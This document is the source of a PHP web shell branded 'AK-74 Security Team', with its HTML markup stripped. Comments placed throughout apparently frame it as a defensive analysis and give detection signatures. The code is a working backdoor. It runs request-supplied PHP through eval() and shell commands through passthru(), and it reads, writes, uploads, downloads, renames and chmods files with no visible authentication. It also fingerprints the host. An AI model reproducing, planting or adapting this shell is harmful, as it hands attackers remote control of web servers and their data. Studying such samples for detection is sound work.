04.03.2010 w
AK-74 Security Team Web Shell A:link { COLOR: #4d6d91; TEXT-DECORATION: underline } A:active { COLOR: #4d6d91; TEXT-DECORATION: underline } A:visited { COLOR: #4d6d91; TEXT-DECORATION: underline } A:hover { COLOR: #C10000; TEXT-DECORATION: underline } TD { FONT-SIZE: 10pt; FONT-FAMILY: verdana,arial,helvetica } BODY { FONT-SIZE: 10pt; FONT-FAMILY: verdana,arial,helvetica; SCROLLBAR-FACE-COLOR: #cccccc; SCROLLBAR-HIGHLIGHT-COLOR: #c10000; SCROLLBAR-SHADOW-COLOR: #c10000; SCROLLBAR-3DLIGHT-COLOR: #830000; SCROLLBAR-ARROW-COLOR: #c10000; SCROLLBAR-TRACK-COLOR: #eeeeee; FONT-FAMILY: verdana; SCROLLBAR-DARKSHADOW-COLOR: #830000; BACKGROUND-COLOR: #dcdcdc; }
| .:: :[ AK-74 Security Team Web-shell ]: ::. | "; return $res; }
/*
 * Analyst annotation (defensive review of a PHP web shell sample).
 * Scope: this range holds methods of a class instantiated later as shell; the
 * class header and the start of the method that ends on the line above are not
 * part of this excerpt. HTML that stood inside the string literals was stripped
 * during extraction, so form fields and link targets are not visible here.
 * The banner text closed on the line above (AK-74 Security Team Web-shell) is a
 * fixed string and a usable signature for content scanning.
 * No authentication or caller check appears anywhere in the visible code;
 * whether one exists in the missing head of the file cannot be determined here.
 *
 * outputmenu(): returns the menu fragment of the page as a string.
 */
function outputmenu() { $res = ""; $res .= " | | "; return $res; }
/* outputdown(): returns a closing page fragment; the dispatcher appends it to the output last. */
function outputdown() { $res = ""; $res .= "
"; return $res; }
/*
 * outputfilemanager(): builds the listing for the directory held in
 * $_SESSION[currentdir]. Directory names come from getdirs() and file records
 * (filename, filesize, lastmod keys) from getfiles(); both, like getpermission(),
 * are defined outside this excerpt. Each row carries a delete label, file rows
 * also an edit label. Names are concatenated into the page without escaping.
 * The trailing literals are presumably the stripped create-directory,
 * create-file and upload forms - TODO confirm against an intact copy.
 */
function outputfilemanager() { $res = ""; $number = 0; $dirs = $this->getdirs(); $files = $this->getfiles(); sort($dirs); sort($files); $res .= " :".$_SESSION["currentdir"]." , "; for ($i = 0; $i < count($dirs); $i++) { $res .= "".(++$number)."".$dirs[$i]." "; $res .= "".($this->getpermission($_SESSION["currentdir"]."/".$dirs[$i])).""; $res .= " delete"; } for ($i = 0; $i < count($files); $i++) { $res .= "".(++$number).""; $res .= "".$files[$i]["filename"].""; $res .= " ".$files[$i]["filesize"].""; $res .= "".$files[$i]["lastmod"].""; $res .= "".($this->getpermission($_SESSION["currentdir"]."/".$files[$i]["filename"])).""; $res .= "edit"; $res .= "delete"; } $res .= "
"; $res .= ""; $res .= "| : | | "; $res .= "| : | | "; $res .= "| : | | | "; $res .= " "; $res .= "| Copyright AK-74 Security Team 2005 - ".date("Y")." | "; return $res; }
/*
 * outputinfo(): host fingerprinting panel. Prints php_uname(), phpversion(),
 * the script owner name, uid and gid (get_current_user, getmyuid, getmygid) and
 * the SERVER_SOFTWARE, REQUEST_METHOD, SERVER_ADDR, REMOTE_ADDR and
 * HTTP_X_FORWARDED_FOR environment values. None of the values is escaped.
 */
function outputinfo() { $res = ""; $res .= " | |
1. OS - ".(php_uname())."
2. PHP - ".(phpversion())."
3. User - ".( get_current_user())." || User ID - ".( getmyuid())." || Group ID - ".( getmygid ())."
4. Server Software - ".(getenv("SERVER_SOFTWARE"))."
5. Request Method - ".(getenv("REQUEST_METHOD"))."
6. Server IP - ".(getenv("SERVER_ADDR"))."
7. Your IP - ".(getenv("REMOTE_ADDR"))."
8. X Forwarded For IP - ".(getenv("HTTP_X_FORWARDED_FOR"))."
| | Copyright AK-74 Security Team 2005 - ".date("Y")." | "; return $res; }
/*
 * chmodform($file): renders the permission editor for $file from
 * getpermissionarray($file), defined outside this excerpt. Element 0 is shown
 * as text and the loop emits nine cells, presumably the checkboxes that
 * chmodfile() reads as perms1 to perms9 (field markup stripped).
 */
function chmodform($file) { $perms = $this->getpermissionarray($file); $res = ""; $res .= "" ." | | "; $res .= "| | r | w | x | r | w | x | r | w | x | "; $res .= "| ".$perms[0]." | "; for ($i = 1; $i <= 9; $i++) $res .= " | "; $res .= " | | "; $res .= " | "; return $res; }
/*
 * editfileform($file): opens $file read-only and returns its whole content,
 * passed through htmlspecialchars(), inside the edit form. Returns a
 * one-space string when fopen() fails. The dispatcher passes the GET
 * parameter file straight in, so any file the PHP process can read is
 * displayed.
 */
function editfileform($file) { $fp = fopen($file,"r"); if (!$fp) return " "; $res = ""; $res .= "" ." | | "; $res .= "| ".(htmlspecialchars(fread($fp, filesize($file))))." | "; $res .= "| Rename: - | "; $res .= " | "; fclose($fp); return $res; }
/* executeform(): returns the input form for the PHP evaluation feature (markup stripped). */
function executeform() { $res = ""; $res .= " PHP-
PHP ( <? ?> ) ! | | | | Copyright AK-74 Security Team 2005 - ".date("Y")." | "; return $res; }
/*
 * execute(): runs the POST field phpcode through eval() after stripslashes().
 * eval is a language construct, so the disable_functions ini directive does
 * not cover it. For detection: the dispatcher reaches this method on POST
 * action=execute, and eval applied directly to a request variable is a
 * high-confidence static signature.
 */
function execute() { echo " "; echo "
"; eval(stripslashes($_POST["phpcode"])); echo "
"; echo " "; }
/* exesysform(): returns the input form for the system command feature (markup stripped). */
function exesysform() { $res = ""; $res .= " | Execute system commands! | | | | Copyright AK-74 Security Team 2005 - ".date("Y")." | "; return $res; }
/*
 * exesys(): hands the POST field cmmd to passthru(), which writes the command
 * output straight into the response; $result is assigned but never read.
 * Reached on POST action=exesys. passthru is a regular function and can be
 * blocked with disable_functions; process-creation telemetry from the web
 * server account is the runtime signal.
 */
function exesys() { echo " "; echo "
"; $result = passthru($_POST["cmmd"]); echo "
"; echo " "; }
/*
 * editfile($file): when the POST field rename is non-empty, renames the POST
 * field file to it; then opens the rename path for writing and stores the
 * POST field filecontent (after stripslashes). The $file parameter is never
 * used. Returns 0 when fopen() fails, 1 otherwise. Paths are taken from the
 * request unchanged, so writes are limited only by filesystem permissions.
 */
function editfile($file) { if (!empty($_POST["rename"])) { rename ($_POST["file"], $_POST["rename"]); } $fp = fopen($_POST["rename"],"w"); if (!$fp) return 0; fwrite($fp, stripslashes($_POST["filecontent"])); fclose($fp); return 1; }
/*
 * chmodfile($file): assembles a mode word from the POST field perms0 (file
 * type letter, high bits) and the presence of perms1 to perms9 (rwx bits for
 * owner, group, other), echoes the last four octal digits and passes them to
 * chmod(). Because only those four digits are kept, the type bits set from
 * perms0 never reach chmod(). Returns the chmod() result.
 */
function chmodfile($file) { $res = 0; switch ($_POST["perms0"]) { case "s": $res = $res | 0xC000; break; case "l": $res = $res | 0xA000; break; case "-": $res = $res | 0x8000; break; case "b": $res = $res | 0x6000; break; case "d": $res = $res | 0x4000; break; case "c": $res = $res | 0x2000; break; case "p": $res = $res | 0x1000; break; case "u": break; } if (isset($_POST["perms1"])) $res = $res | 0x0100; if (isset($_POST["perms2"])) $res = $res | 0x0080; if (isset($_POST["perms3"])) $res = $res | 0x0040; if (isset($_POST["perms4"])) $res = $res | 0x0020; if (isset($_POST["perms5"])) $res = $res | 0x0010; if (isset($_POST["perms6"])) $res = $res | 0x0008; if (isset($_POST["perms7"])) $res = $res | 0x0004; if (isset($_POST["perms8"])) $res = $res | 0x0002; if (isset($_POST["perms9"])) $res = $res | 0x0001; echo substr(sprintf("%o", $res), -4); return chmod($file,intval(substr(sprintf("%o", $res), -4),8)); }
/*
 * downloadfile($file): starts the attachment response headers; the
 * Content-Length statement begun here continues beyond this line range.
 */
function downloadfile($file) { header ("Content-Type: application/octet-stream"); header ("Content-Length: " . 
filesize($file)); header ("Content-Disposition: attachment; filename=$file"); readfile($file); die(); }
/*
 * Analyst annotation (defensive review of a PHP web shell sample).
 * The line above is the tail of downloadfile($file), whose opening lies before
 * this range: it finishes the Content-Length header, interpolates $file
 * unquoted into Content-Disposition, streams the file with readfile() and
 * ends the request with die(). The dispatcher supplies the GET parameter file.
 *
 * createdir(): creates the POST field dircreate below $_SESSION[currentdir]
 * with mkdir(). The name is not normalised or checked. The two return
 * literals were presumably status messages whose text was lost in extraction.
 */
function createdir() { if (!empty($_POST["dircreate"])) if (mkdir($_SESSION["currentdir"]."/".$_POST["dircreate"])) return " !"; return " "; }
/*
 * createfile(): creates an empty file named by the POST field filecreate below
 * the current directory; returns early if the path already exists.
 */
function createfile() { if (!empty($_POST["filecreate"])) { if (file_exists($_SESSION["currentdir"]."/".$_POST["filecreate"])) return " "; $fp = fopen($_SESSION["currentdir"]."/".$_POST["filecreate"],"w"); if ($fp) { fclose($fp); return " !"; } } return " "; }
/*
 * uploadfile(): stores the uploaded part named filename in the current
 * directory under the POST field filename2, or under the client-supplied
 * name when filename2 is empty. Returns the literal 121212 on an upload
 * error. copy() is attempted first and move_uploaded_file() only as a
 * fallback. Neither extension nor content is checked, so this is the path
 * by which further files can be placed on the host.
 */
function uploadfile() { if ($_FILES["filename"]["error"] != 0) return "121212"; $_POST["filename2"] = trim($_POST["filename2"]); if (empty($_POST["filename2"])) $_POST["filename2"] = $_FILES["filename"]["name"]; if (!copy($_FILES["filename"]["tmp_name"],$_SESSION["currentdir"]."/".$_POST["filename2"])) if (!move_uploaded_file($_FILES["filename"]["tmp_name"],$_SESSION["currentdir"]."/".$_POST["filename2"])) return " ..."; return " !"; } }
/*
 * Request handling starts here; the second brace above closes the class.
 * The current directory defaults to DOCUMENT_ROOT and is kept in the session;
 * the GET parameter dir is resolved with realpath() and accepted whenever
 * opendir() succeeds, with no check that the result stays below the document
 * root. The opendir() handle is never closed, and execution continues after
 * the Location header is sent. $xshell is not defined in this excerpt.
 * Both str_replace() calls have an empty search string in this copy
 * (presumably a backslash lost in extraction - TODO confirm); as written they
 * return the subject unchanged.
 */
$shell = new shell(); $timestart = $shell->getmicrotime(); $content = ""; if (!isset($_SESSION["currentdir"])) $_SESSION["currentdir"] = str_replace("","/",$_SERVER["DOCUMENT_ROOT"]); if (isset($_GET["dir"])) { if (opendir(realpath($_SESSION["currentdir"]."/".$_GET["dir"]))) $_SESSION["currentdir"] = realpath($_SESSION["currentdir"]."/".$_GET["dir"]); Header("Location: $xshell?act=filemanager"); } $_SESSION["currentdir"] = str_replace("","/",$_SESSION["currentdir"]); if (substr($_SESSION["currentdir"],-1,1) == "/") $_SESSION["currentdir"] = substr($_SESSION["currentdir"],0,-1);
/*
 * POST dispatcher, keyed on the field action: chmod, editfile, execute,
 * exesys, mkdir, createfile, uploadfile. It runs before any page output is
 * assembled and nothing visible gates it. In web logs these requests appear
 * as POSTs to a single script; the field names are only visible with
 * request-body capture.
 */
switch ($_POST["action"]) { case "chmod": if($shell->chmodfile($_POST["file"])) $content .= " "; break; case "editfile": if ($shell->editfile($_POST["file"])) $content .= " "; break; case "execute": $shell->execute(); break; case "exesys": $shell->exesys(); break; case "mkdir": $content .= $shell->createdir(); break; case "createfile": $content .= $shell->createfile(); break; case "uploadfile": $content .= $shell->uploadfile(); break; } $content .= 
$shell->outputhead(); $content .= $shell->outputmenu();
/*
 * GET dispatcher, keyed on the parameter act: edit, chmod, down,
 * filemanager (with act2=del calling removefile() and act3=del calling
 * removedir(), both defined outside this excerpt), phpinfo, info, execute,
 * exesys. These values appear in the query string, so access logs alone can
 * surface them. The phpinfo branch prints the full phpinfo() page and exits.
 */
switch ($_GET["act"]) { case "edit": $content .= $shell->editfileform($_GET["file"]); break; case "chmod": $content .= $shell->chmodform($_GET["file"]); break; case "down": $content .= $shell->downloadfile($_GET["file"]); break; case "filemanager": if ($_GET["act2"] == "del") $content .= $shell->removefile(); $content .= $shell->outputfilemanager(); if ($_GET["act3"] == "del") $content .= $shell->removedir(); break; case "phpinfo": phpinfo(); die(); break; case "info": $content .= $shell->outputinfo(); break; case "execute": $content .= $shell->executeform(); break; case "exesys": $content .= $shell->exesysform(); break; } $content .= $shell->outputdown(); echo $content; echo " : ".($shell->getmicrotime()-$timestart).""; ?>